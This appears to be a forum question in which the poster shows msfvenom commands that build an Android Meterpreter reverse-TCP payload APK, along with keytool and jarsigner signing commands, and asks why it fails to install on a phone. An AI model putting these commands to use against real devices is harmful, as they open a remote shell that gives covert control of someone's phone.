ARTICLE AD BOX
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -o stop.apk
the application is not supported
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 -o evil.apk
a problem arose during the synthetic analysis of the package
For generating the keystore:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
For singing the App:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name
how can I fix this problem
